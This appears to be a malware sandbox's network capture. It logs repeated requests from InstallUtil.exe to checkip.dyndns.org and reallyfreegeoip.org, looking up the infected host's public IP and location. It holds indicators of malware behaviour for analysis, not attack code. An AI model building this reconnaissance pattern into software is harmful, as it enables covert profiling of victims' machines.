                          Aug 27, 2024 20:03:40.353274107 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:40.943389893 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:40 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: a7096f2b8b4b9fd5f1e6bd2334ecf8ea
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.6 | 49750 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:41.567612886 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:42.139293909 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:42 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 717b033a9a5d4245c240a4190993fd03
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.6 | 49752 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:42.789943933 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:43.394529104 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:43 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 76ae8104950bce861e192e74e48d60ff
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.6 | 49754 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:44.024097919 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:45.398838997 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:45 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 0d24ce5f67447e073c14c088d430dc31
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.649756158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:45.546119928 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:46.547883987 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:46 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 14d1d07d8a64667f722be565ed649905
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:46.552124023 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:46.827107906 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:46 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 9030dd05809327a812dd6a38643d81b1
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:47.858067989 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:48.035428047 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:47 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 1cf83745e7908f8b8f3e8950d15159a9
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.6 | 49757 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:46.559134007 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:48.119939089 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:48 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 2dba7832cbb6bee51ff84cdd17fb14ef
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                          16 | 192.168.2.6 | 49761 | 158.101.44.242 | 80
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:48.694860935 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:49.882810116 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:49 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 9267328e32eade50fcdffe4c339b68dc
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.6 | 49762 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:48.780050039 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:49.816402912 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:49 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 2c7cb995fc85ebe2b001b4d71f77764f
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.6 | 49765 | 158.101.44.242 | 80 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:50.524183035 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:51.098942995 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:51 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: a4ad6a31e2293cd3345be1ef3709ff21
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.6 | 49767 | 158.101.44.242 | 80 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:51.738770962 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:52.927912951 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:52 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 45e82c1dd803e62183a3ab292c7d28c0
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.6 | 49769 | 158.101.44.242 | 80 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:53.773138046 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:54.681615114 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:54 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 3801d7460e15c9cba09a24b33698239b
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.6 | 49773 | 158.101.44.242 | 80 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:55.331221104 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:56.602490902 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:56 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d2ff4453190d20c60d7e2aeb8683b35c
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          22 | 192.168.2.6 | 49775 | 158.101.44.242 | 80 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:57.250965118 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:57.833131075 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:57 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: ea1de5fc1546283344cdcf47c25ffd84
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.6 | 49717 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:18 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:18 UTC | 710 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:18 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40922
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WrAMZz%2FwMs0brYohEJprp9ja8aNOhaIn%2B0MApWoYIBieDp9ZvlUO0%2FtVOE27bVCPxH1rctT3apKNo26PpDg0etpIZ1XIasQPQJ%2FzbxajpKTU4QxkOm2GqrVWcWg0a%2F9r1eoiZHhR"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa4119f34346-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:18 UTC | 340 | IN
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.6 | 49721 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:20 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:20 UTC | 710 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:20 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40924
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2HFU4vdCFV8%2BoCUcG%2BYRBAPWXcn0EoR0xbIXxG0AGgPqyTxY1xFCDstBtFgDZwRl%2Bku4E%2FJ0q2aNJlm0lvcIAaLXeWY%2BZiOtpiJwYFd0EM5mYD6tBLgtQheahz8pZ79Y3NH7ZD1"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa4d6f6d1921-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:20 UTC | 340 | IN
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.6 | 49725 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:22 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:22 UTC | 706 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:22 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40926
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TpOzLWdmLmfw6jRr4WoeJA6Qpje31YIh50S1AkOuymdlKIdAE%2BMH1GINGtFjrvVrIKI2JnX9499YG6%2Fob4RBzw282l4Qffx1Y%2BgNsXQnqXRcRyUxbs0v5tAYA1459EN0TKfLpPbt"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa57d9d48c18-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:22 UTC | 340 | IN
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.6 | 49728 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:24 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:24 UTC | 714 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:24 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40928
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z73fAyKgeyBC%2BpmICSwCzVD63wKrGsZvbKYsnb1%2BvV602a3w3ie%2FVq0gH03AJHYbJTKShxE7S%2BZa7agTn5pvdPYjvaRH3dXoCXQ5hQ%2Bk6dNpnse0zvDF8vGDP1n%2BLiTQHfRZ%2FOXN"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa648cea7d0b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:24 UTC | 340 | IN
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.6 | 49731 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:26 UTC | 708 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:26 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40930
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7E46UxPt0jzAtbCfXC9kEx5bCXtzdbcPnSpECHSdgFW%2FOQgFi3knVt5AR2BJOj%2FXuwTPOgkn1idYWfOH0pewKUaB5mmifi2O%2FSm%2Bm8npShVqUkmAs4qH6U7XRgL50av6C0gcqWK"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa70abac0f41-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:26 UTC | 340 | IN
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.6 | 49733 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:27 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:27 UTC | 704 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:27 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40931
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKbBad4DLzzP5PgHjXRUdTiFze9NNlwQrPA1jvIUso4ARUtPvy1UjidEuEwnpB1NFJNRzY85ANWZyYXTnNdhiu2DQ8sGKp6IaN6HNMO%2BV42svvVG5gKjcanOIeI135MDnK7Z%2Bsy0"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa7a59465e6d-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:27 UTC | 340 | IN
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.6 | 49736 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:29 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:29 UTC | 702 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:29 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40933
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DM4n4i47%2FfySq20zplbNIR0wKHQO9XCK6qdJW9T5plwHZ7oKwC1gp4q7nGK1h7NZSisVDMTY80BpkNjUXeE70JSXs4EgE9DfChOnxn41U7EBANY19AwUeL68OKgW77QtC7hnQwpJ"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa83190b2363-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:29 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:29 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.6 | 49739 | 188.114.97.3 | 443 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:30 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:30 UTC | 695 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:30 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: MISS
                          Last-Modified: Tue, 27 Aug 2024 18:03:30 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9x00RaiyGFNyMeBpsvJvqj7m%2Bu3pnuFSj7C6W7ozoI1GN6Qi5RVCC1Qu1XcqSJXPXvnQOJd0ATaiIUL5%2B5L%2Fe7jV8HClS1QKvMvj7qIzJbxF0mqRE8I14PxtchdXChXWuftxVju"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa8add244d0d-BOS
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:30 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:30 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.6 | 49743 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:39 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:39 UTC | 716 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:39 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40943
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JsYb42AQ%2Br5FMyJAWO9d%2Bu%2BYAbn6pZK8G5%2BB18TSgAjJcBDN4BjJvsKWEnF5Tmvah%2FRv8rMSArbl5htQUug2Qn18h%2FXUL8wDijdOd5C8KXK1%2B8U7hDE8IlE%2B7RrZP2W3SslCGh5"}],"group":"cf-nel","max_age":604800}
